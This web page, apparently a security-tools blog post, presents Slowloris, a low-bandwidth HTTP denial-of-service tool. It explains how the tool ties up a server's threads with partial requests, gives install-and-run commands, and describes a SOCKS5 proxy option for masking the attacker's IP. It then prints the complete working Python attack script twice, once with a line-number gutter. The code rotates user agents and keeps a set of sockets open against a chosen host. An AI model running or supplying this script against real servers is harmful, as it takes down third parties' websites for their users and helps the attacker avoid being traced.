Low Bandwidth DoS Tool – Python script

Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:

1. We start making lots of HTTP requests.
2. We send headers periodically (every ~15 seconds) to keep the connections open.
3. We never close the connection unless the server does so. If the server closes a connection, we create a new one keep doing the same thing.

This exhausts the servers thread pool and the server can’t reply to other people.

How to install and run?

You can clone the git repo or install using pip. Here’s how you run it.

• sudo pip3 install slowloris
• slowloris example.com

That’s all it takes to install and run slowloris.py.

If you want to clone using git instead of pip, here’s how you do it.

• git clone https://github.com/gkbrk/slowloris.git
• cd slowloris
• python3 slowloris.py example.com

SOCKS5 proxy support

However, if you plan on using the-xoption in order to use a SOCKS5 proxy for connecting instead of a direct connection over your IP address, you will need to install thePySockslibrary (or any other implementation of thesockslibrary) as well.PySocksis a fork fromSocksiPyby GitHub user @Anorov and can easily be installed by addingPySocksto thepipcommand above or running it again like so:

• sudo pip3 install PySocks

You can then use the-xoption to activate SOCKS5 support and the--proxy-hostand--proxy-portoption to specify the SOCKS5 proxy host and its port, if they are different from the standard127.0.0.1:8080.

Configuration options

It is possible to modify the behaviour of slowloris with command-line arguments.

License

The code is licensed under the MIT License.

slowloris.py

import socket, random, time, sys, argparse, random, logging parser = argparse.ArgumentParser(description=”Slowloris, low bandwidth stress test tool for websites”) parser.add_argument(‘host’, nargs=”?”, help=”Host to preform stress test on”) parser.add_argument(‘-p’, ‘–port’, default=80, help=”Port of webserver, usually 80″, type=int) parser.add_argument(‘-s’, ‘–sockets’, default=150, help=”Number of sockets to use in the test”, type=int) parser.add_argument(‘-v’, ‘–verbose’, dest=”verbose”, action=”store_true”, help=”Increases logging”) parser.add_argument(‘-ua’, ‘–randuseragents’, dest=”randuseragent”, action=”store_true”, help=”Randomizes user-agents with each request”) parser.add_argument(‘-x’, ‘–useproxy’, dest=”useproxy”, action=”store_true”, help=”Use a SOCKS5 proxy for connecting”) parser.add_argument(‘–proxy-host’, default=”127.0.0.1″, help=”SOCKS5 proxy host”) parser.add_argument(‘–proxy-port’, default=”8080″, help=”SOCKS5 proxy port”, type=int) parser.set_defaults(verbose=False) parser.set_defaults(randuseragent=False) parser.set_defaults(useproxy=False) args = parser.parse_args() if len(sys.argv)<=1: parser.print_help() sys.exit(1) if not args.host: print(“Host required!”) parser.print_help() sys.exit(1) if args.useproxy: print(“Using SOCKS5 proxy for connecting…”) try: import socks socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port) socket.socket = socks.socksocket except ImportError: print(“Socks Proxy Library Not Available!”) if args.verbose == True: logging.basicConfig(format=”[%(asctime)s] %(message)s”, datefmt=”%d-%m-%Y %H:%M:%S”, level=logging.DEBUG) else: logging.basicConfig(format=”[%(asctime)s] %(message)s”, datefmt=”%d-%m-%Y %H:%M:%S”, level=logging.INFO) list_of_sockets = [] user_agents = [ “Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0”, “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0″,”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50”, “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14”, “Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393” ] def init_socket(ip): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((ip,args.port)) s.send(“GET /?{} HTTP/1.1\r\n”.format(random.randint(0, 2000)).encode(“utf-8”)) if args.randuseragent: s.send(“User-Agent: {}\r\n”.format(random.choice(user_agents)).encode(“utf-8”)) else: s.send(“User-Agent: {}\r\n”.format(user_agents[0]).encode(“utf-8”)) s.send(“{}\r\n”.format(“Accept-language: en-US,en,q=0.5”).encode(“utf-8”)) return s def main(): ip = args.host socket_count = args.sockets logging.info(“Attacking %s with %s sockets.”, ip, socket_count) logging.info(“Creating sockets…”) for _ in range(socket_count): try: logging.debug(“Creating socket nr %s”, _) s = init_socket(ip) except socket.error: break list_of_sockets.append(s) while True: logging.info(“Sending keep-alive headers… Socket count: %s”, len(list_of_sockets)) for s in list(list_of_sockets): try: s.send(“X-a: {}\r\n”.format(random.randint(1, 5000)).encode(“utf-8”)) except socket.error: list_of_sockets.remove(s) for _ in range(socket_count – len(list_of_sockets)): logging.debug(“Recreating socket…”) try: s = init_socket(ip) if s: list_of_sockets.append(s) except socket.error: break time.sleep(15) if __name__ == “__main__”: main()

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113

import socket, random, time, sys, argparse, random, logging   parser = argparse.ArgumentParser(description=”Slowloris, low bandwidth stress test tool for websites”) parser.add_argument(‘host’, nargs=”?”, help=”Host to preform stress test on”) parser.add_argument(‘-p’, ‘–port’, default=80, help=”Port of webserver, usually 80″, type=int) parser.add_argument(‘-s’, ‘–sockets’, default=150, help=”Number of sockets to use in the test”, type=int) parser.add_argument(‘-v’, ‘–verbose’, dest=”verbose”, action=”store_true”, help=”Increases logging”) parser.add_argument(‘-ua’, ‘–randuseragents’, dest=”randuseragent”, action=”store_true”, help=”Randomizes user-agents with each request”) parser.add_argument(‘-x’, ‘–useproxy’, dest=”useproxy”, action=”store_true”, help=”Use a SOCKS5 proxy for connecting”) parser.add_argument(‘–proxy-host’, default=”127.0.0.1″, help=”SOCKS5 proxy host”) parser.add_argument(‘–proxy-port’, default=”8080″, help=”SOCKS5 proxy port”, type=int) parser.set_defaults(verbose=False) parser.set_defaults(randuseragent=False) parser.set_defaults(useproxy=False) args = parser.parse_args()   if len(sys.argv)<=1: parser.print_help() sys.exit(1)   if not args.host: print(“Host required!”) parser.print_help() sys.exit(1)   if args.useproxy: print(“Using SOCKS5 proxy for connecting…”) try: import socks socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port) socket.socket = socks.socksocket except ImportError: print(“Socks Proxy Library Not Available!”) if args.verbose == True: logging.basicConfig(format=”[%(asctime)s] %(message)s”, datefmt=”%d-%m-%Y %H:%M:%S”, level=logging.DEBUG) else: logging.basicConfig(format=”[%(asctime)s] %(message)s”, datefmt=”%d-%m-%Y %H:%M:%S”, level=logging.INFO)   list_of_sockets = [] user_agents = [ “Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0”, “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0″,”Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50”, “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14”, “Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”, “Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36”, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50”, “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393” ]   def init_socket(ip): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(4) s.connect((ip,args.port))   s.send(“GET /?{} HTTP/1.1\r\n”.format(random.randint(0, 2000)).encode(“utf-8”)) if args.randuseragent: s.send(“User-Agent: {}\r\n”.format(random.choice(user_agents)).encode(“utf-8”)) else: s.send(“User-Agent: {}\r\n”.format(user_agents[0]).encode(“utf-8”)) s.send(“{}\r\n”.format(“Accept-language: en-US,en,q=0.5”).encode(“utf-8”)) return s   def main(): ip = args.host socket_count = args.sockets logging.info(“Attacking %s with %s sockets.”, ip, socket_count)   logging.info(“Creating sockets…”) for _ in range(socket_count): try: logging.debug(“Creating socket nr %s”, _) s = init_socket(ip) except socket.error: break list_of_sockets.append(s)   while True: logging.info(“Sending keep-alive headers… Socket count: %s”, len(list_of_sockets)) for s in list(list_of_sockets): try: s.send(“X-a: {}\r\n”.format(random.randint(1, 5000)).encode(“utf-8”)) except socket.error: list_of_sockets.remove(s)   for _ in range(socket_count – len(list_of_sockets)): logging.debug(“Recreating socket…”) try: s = init_socket(ip) if s: list_of_sockets.append(s) except socket.error: break time.sleep(15)   if __name__ == “__main__”: main()